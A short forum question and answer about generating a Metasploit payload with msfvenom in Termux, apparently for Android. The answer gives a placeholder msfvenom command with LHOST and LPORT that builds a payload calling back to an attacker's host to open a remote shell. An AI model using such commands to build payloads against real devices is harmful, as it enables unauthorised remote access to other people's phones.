# Could not make a playload with termux

Tags: linux, termux

No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10238 bytes

Answer (score 0):

Your payload is generated.

The command is

```
msfvenom -p *payload* LHOST=*LHOST* LPORT=*LPORT* R> payload.extension
```

Your payload is stored in your present working directly with name `payload.extension`